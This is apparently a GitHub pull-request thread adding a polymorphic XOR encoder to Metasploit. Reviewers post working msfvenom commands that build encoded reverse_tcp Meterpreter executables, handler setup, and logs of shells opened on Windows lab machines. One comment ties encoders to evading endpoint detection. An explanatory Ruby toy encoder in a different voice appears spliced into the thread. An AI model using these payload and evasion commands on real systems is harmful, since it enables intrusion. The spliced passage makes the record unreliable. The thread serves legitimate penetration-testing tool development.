
Add encoder module x86/xor_poly at path modules/encoder/x86/xor_poly.rb, Rubocop clean, msftidy clean #17401

Merged (18 commits) Mar 20, 2023

Conversation

@araout42 (Contributor) commented Dec 20, 2022

Add encoder module x86/xor_poly at path modules/encoder/x86/xor_poly.rb, Rubocop clean, msftidy clean

It has 100% polymorphism: all the bytes change from one generation to another.

probably should be ranked as excellent since it has many many permutations for badchars

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/multi/handler
  • set lhost 127.0.0.1
  • set payload linux/x86/meterpreter/reverse_tcp
  • exploit expected : Started listener ...
  • Run ./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -e x86/xor_poly -b "\x00\x90" > /tmp/Test && chmod +x /tmp/Test
  • /tmp/Test expected: connects to the listener and gives a meterpreter session, as in the video
2022-12-20.16-13-46.mov

@gwillcox-r7 (Contributor)

Updated PR description to make things easier to read.

@araout42 araout42 changed the title Add encoder module x86/xor at path modules/encoder/x86/xor.rb, Rubocop clean, msftidy clean Add encoder module x86/xor_poly at path modules/encoder/x86/xor_poly.rb, Rubocop clean, msftidy clean Jan 4, 2023
@sempervictus (Contributor)

This is neat stuff, thank you. Any chance of an x64 version for parity (and utility, not a lot of x86 targets around anymore and WOW64 tends to "count toward badness score" by EDR from what i've seen)? 😄

@araout42 (Contributor, Author) commented Jan 12, 2023

Hey @sempervictus, I'm really glad you appreciate it!
Yes, I can make an x64 version with no problem.
I think exactly the same code would work for x64,
I'm not sure though, as I haven't done any testing on this.
I will test/dev an x64 version when my work gives me a little bit of time.
Thanks

@araout42 (Contributor, Author) commented Jan 13, 2023

After some testing, the same code cannot be used for x64, since it needs a little bit of tweaking for instruction sizes and the register permutations.
I will do a separate, almost identical, x64 version that I will most likely commit in another PR, since it will be another module.

@sempervictus (Contributor)

@araout42 - thank you sir, encoders are long-lived tools in the satchel so the more working ones we have, the merrier.

@bcoles bcoles added the payload label Jan 14, 2023
@bwatters-r7 bwatters-r7 self-assigned this Feb 28, 2023
@bwatters-r7 (Contributor)

Hi there, @araout42; this looks great.
There's at least one super minor thing I'd like to ask you to change, but the first thing I want to do is get this working, and I cannot seem to be able to do it.

In your verification steps, you invoke this with -e x86/xor which fails for me as an invalid encoder. I'm guessing you changed the name at some point to x86/xor_poly, which I completely agree with to help differentiate it, so when I invoke it with x86/xor_poly, it does seem to use the right encoder, but still fails to find the right nop permutation, I believe:

[ruby-3.0.2](land-17401) tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -e x86/xor_poly -b "\x00\x90\x58\x59"
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/xor_poly
x86/xor_poly failed with Encoding failed due to a bad character (index=44, char=0x58)
Error: No Encoder Succeeded
[ruby-3.0.2](land-17401) tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -e x86/xor_poly -i 20 -b "\x00\x90\x58\x59"
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 20 iterations of x86/xor_poly
x86/xor_poly failed with Encoding failed due to a bad character (index=47, char=0x58)
Error: No Encoder Succeeded
[ruby-3.0.2](land-17401) tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -e x86/xor_poly -i 200 -b "\x00\x90\x58\x59"
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 200 iterations of x86/xor_poly
x86/xor_poly failed with Encoding failed due to a bad character (index=49, char=0x59)
Error: No Encoder Succeeded
[ruby-3.0.2](land-17401) tmoose@ubuntu:~/rapid7/metasploit-framework$ md5sum modules/encoders/x86/xor_poly.rb 
1caea537f769f4471259e21192b8039a  modules/encoders/x86/xor_poly.rb

Please let me know if I'm missing something?

@araout42 (Contributor, Author) commented Mar 1, 2023

First, you are right, I did change the name from xor to xor_poly after a recommendation I received (I have now edited my first message to reflect this change in the verification steps).

The second point is that it cannot find a proper permutation without the badchars 0x58 and 0x59.
The reason is that I added the preserve-register functionality afterwards, and it requires the opcodes 0x58 and 0x59:

pop eax -> 0x58

The error message is given by the encoder and says that no permutation has been found with this badchar set.

So it is working properly.

But I can implement another polymorphism routine to be able to handle these badchars as well ^^

As of now I have also changed my first message to use only the badchars 0x00 and 0x90, so the encoding can be done properly.
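To make the two points of this thread concrete (the per-generation key change the PR description calls polymorphism, and the failure above when 0x58/0x59 are banned), here is an added toy model in Ruby. It is not the x86/xor_poly module's code and encodes no real machine code: the stub bytes and the sample payload are constructed placeholders, and the only detail borrowed from the discussion is that the register-restoring epilogue ends in pop eax (0x58) and pop ecx (0x59), so those bytes are in the decoder stub and no key choice can remove them.

```ruby
# Added example: a toy model of a badchar-aware single-byte XOR encoder.
# This is NOT the x86/xor_poly module's code and performs no real encoding
# of machine code; the stub bytes and payload below are constructed placeholders.

BadCharError = Class.new(StandardError)

# Constructed placeholder for the decoder stub. The only property borrowed
# from the PR discussion is that the register-preserving epilogue ends with
# pop eax (0x58) and pop ecx (0x59); the head bytes are arbitrary filler.
STUB_HEAD = "\x01\x02\x03\x04".b
STUB_TAIL = "\x58\x59".b
STUB_LEN  = STUB_HEAD.bytesize + 1 + STUB_TAIL.bytesize # head + key byte + tail

# Stub for a given key: the key has to live somewhere in the stub, so it is
# subject to the badchar check as well.
def build_stub(key)
  STUB_HEAD + [key].pack('C') + STUB_TAIL
end

# XOR every byte of +buf+ with the single-byte +key+.
def xor_bytes(buf, key)
  buf.bytes.map { |b| b ^ key }.pack('C*')
end

# First [index, byte] of +buf+ that is in +badchars+, or nil when clean.
def first_badchar(buf, badchars)
  buf.each_byte.with_index do |b, i|
    return [i, b] if badchars.include?(b)
  end
  nil
end

# Try the 255 non-identity keys in random order (a different key, hence a
# different encoded body, on every run) and return the first stub+body that
# contains no bad character. If none does, fail the way the module's log
# line does, naming the index and value of the offending byte.
def encode(payload, badchars, rng: Random.new)
  last_fail = nil
  (1..255).to_a.shuffle(random: rng).each do |key|
    candidate = build_stub(key) + xor_bytes(payload, key)
    bad = first_badchar(candidate, badchars)
    return { key: key, blob: candidate } if bad.nil?
    last_fail = bad
  end
  idx, chr = last_fail
  raise BadCharError,
        format('Encoding failed due to a bad character (index=%d, char=0x%02x)', idx, chr)
end

# Recover the original payload from an encoded blob.
def decode(blob, key)
  xor_bytes(blob[STUB_LEN..], key)
end

# Constructed sample payload (not shellcode) containing the NULs and NOPs
# that the -b "\x00\x90" badchar set in the PR must eliminate.
SAMPLE = "\x00\x90\x31\xc0\x00\x90\x68\x2f\x2f\x73\x68\x00".b

if __FILE__ == $PROGRAM_NAME
  out = encode(SAMPLE, [0x00, 0x90])
  puts format('key=0x%02x blob=%s', out[:key], out[:blob].unpack1('H*'))
  begin
    # 0x58/0x59 sit in the stub itself, so no key can ever make this succeed.
    encode(SAMPLE, [0x00, 0x90, 0x58, 0x59])
  rescue BadCharError => e
    puts e.message
  end
end
```

Running it twice prints two different keys and encoded bodies for the same input, which is the property the PR description measures; with 0x58 and 0x59 added to the badchar list every candidate is rejected at the stub and the search ends with the same "Encoding failed due to a bad character" message seen in the msfvenom output above. For a reviewer, the useful takeaway is that the badchar check has to cover the decoder stub as well as the encoded body, and that a stub containing a banned opcode is a hard failure rather than one more iteration can fix.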

@bwatters-r7 (Contributor) commented Mar 1, 2023

Sweet; thanks, @araout42. I appreciate the quick answer! If I can't get it to work in the example and default setting, I usually assume there's a setup step or something else that I've missed. In this case, given the changing feature set, it makes sense the old example did not work worked properly in an unanticipated way.

@araout42 (Contributor, Author) commented Mar 1, 2023

> Sweet; thanks, @araout42. I appreciate the quick answer! If I can't get it to work in the example and default setting, I usually assume there's a setup step or something else that I've missed. In this case, given the changing feature set, it makes sense the old example did not work worked properly in an unanticipated way.

No problem and thank you

Well, I'd be happy to implement this minor change you've mentioned earlier :)

@bwatters-r7 (Contributor)

It was a minor thing I noticed, but I wanted to get everything working and do a deeper dive to make sure that there was nothing else I saw. I don't want to keep asking you to change things, so I'll try and get all the requested changes to you all at once. We appreciate your time and don't want to waste it!

@bwatters-r7 (Contributor)

Creating payload

[ruby-3.0.2](land-17401) tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.5.135.201 LPORT=4585 -f exe -e x86/xor_poly -i 20 -b "\x00\x90" -o revtcpx86_xor.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 20 iterations of x86/xor_poly
x86/xor_poly succeeded with size 403 (iteration=0)
x86/xor_poly succeeded with size 453 (iteration=1)
x86/xor_poly succeeded with size 505 (iteration=2)
x86/xor_poly succeeded with size 557 (iteration=3)
x86/xor_poly succeeded with size 609 (iteration=4)
x86/xor_poly succeeded with size 659 (iteration=5)
x86/xor_poly succeeded with size 709 (iteration=6)
x86/xor_poly succeeded with size 759 (iteration=7)
x86/xor_poly succeeded with size 808 (iteration=8)
x86/xor_poly succeeded with size 856 (iteration=9)
x86/xor_poly succeeded with size 904 (iteration=10)
x86/xor_poly succeeded with size 953 (iteration=11)
x86/xor_poly succeeded with size 1003 (iteration=12)
x86/xor_poly succeeded with size 1054 (iteration=13)
x86/xor_poly succeeded with size 1105 (iteration=14)
x86/xor_poly succeeded with size 1156 (iteration=15)
x86/xor_poly succeeded with size 1203 (iteration=16)
x86/xor_poly succeeded with size 1251 (iteration=17)
x86/xor_poly succeeded with size 1301 (iteration=18)
x86/xor_poly succeeded with size 1353 (iteration=19)
x86/xor_poly chosen with final size 1353
Payload size: 1353 bytes
Final size of exe file: 73802 bytes
Saved as: revtcpx86_xor.exe

Getting callback

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 exploit(multi/handler) > set lport 4585
lport => 4585
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] Sending stage (175686 bytes) to 10.5.134.191
[*] Meterpreter session 1 opened (10.5.135.201:4585 -> 10.5.134.191:50164) at 2023-03-01 13:47:44 -0600

meterpreter > sysinfo
Computer        : WIN10X86-1511
OS              : Windows 10 (10.0 Build 10586).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

@bwatters-r7 (Contributor)

Quick and dirty testing....

The raw unencoded payload has nulls and nops


The encoded version also has nulls and nops


Encoded version with bad chars flagged does not contain the bad chars


@bwatters-r7 (Contributor) left a review comment

So it turns out the minor thing I was going to have you fix was actually right, and I just misread it. Another reason to make sure I get it working before I suggest a fix 😆.
The only thing I see is this minor typo.

Review thread on modules/encoders/x86/xor_poly.rb (outdated, resolved)
@araout42 (Contributor, Author) commented Mar 1, 2023

Thank you, well it seems perfect.
I will read all the code tomorrow or the day after.
I also have a few other modifications to make to the comments; I am not sure if we keep the comments in the code.

@bwatters-r7 (Contributor)

I would definitely leave the comments, especially with something this complex.

@araout42 (Contributor, Author) commented Mar 2, 2023

Well I've reread everything, and made slight changes with the comments.
So everything is Ok on my side

@bwatters-r7 (Contributor)

Create payload

[ruby-3.0.2](land-17401) tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.5.135.201 LPORT=4585 -f exe -e x86/xor_poly -b "\x00\x90" -i 20 -o revtcpx86_xor.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 20 iterations of x86/xor_poly
x86/xor_poly succeeded with size 405 (iteration=0)
x86/xor_poly succeeded with size 458 (iteration=1)
x86/xor_poly succeeded with size 509 (iteration=2)
x86/xor_poly succeeded with size 561 (iteration=3)
x86/xor_poly succeeded with size 612 (iteration=4)
x86/xor_poly succeeded with size 661 (iteration=5)
x86/xor_poly succeeded with size 711 (iteration=6)
x86/xor_poly succeeded with size 759 (iteration=7)
x86/xor_poly succeeded with size 809 (iteration=8)
x86/xor_poly succeeded with size 860 (iteration=9)
x86/xor_poly succeeded with size 907 (iteration=10)
x86/xor_poly succeeded with size 955 (iteration=11)
x86/xor_poly succeeded with size 1005 (iteration=12)
x86/xor_poly succeeded with size 1057 (iteration=13)
x86/xor_poly succeeded with size 1108 (iteration=14)
x86/xor_poly succeeded with size 1156 (iteration=15)
x86/xor_poly succeeded with size 1204 (iteration=16)
x86/xor_poly succeeded with size 1253 (iteration=17)
x86/xor_poly succeeded with size 1303 (iteration=18)
x86/xor_poly succeeded with size 1352 (iteration=19)
x86/xor_poly chosen with final size 1352
Payload size: 1352 bytes
Final size of exe file: 73802 bytes
Saved as: revtcpx86_xor.exe

Collect Shell:

msf6 exploit(multi/handler) > use payload/windows/meterpreter/reverse_tcp
msf6 payload(windows/meterpreter/reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(windows/meterpreter/reverse_tcp) > set lport 4585
lport => 4585
msf6 payload(windows/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0

msf6 payload(windows/meterpreter/reverse_tcp) > [*] Started reverse TCP handler on 10.5.135.201:4585 
[*] Sending stage (175686 bytes) to 10.5.134.199
[*] Meterpreter session 1 opened (10.5.135.201:4585 -> 10.5.134.199:49875) at 2023-03-20 17:43:51 -0500

msf6 payload(windows/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10X86_1803
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

@bwatters-r7 bwatters-r7 merged commit 3b73adf into rapid7:master Mar 20, 2023
@bwatters-r7 (Contributor)

Release Notes

This PR adds a new x86 XOR polymorphic encoder.

@jheysel-r7 jheysel-r7 added the rn-enhancement release notes enhancement label Mar 24, 2023
@adfoster-r7 adfoster-r7 added rn-modules release notes for new or majorly enhanced modules and removed rn-enhancement release notes enhancement labels Apr 5, 2023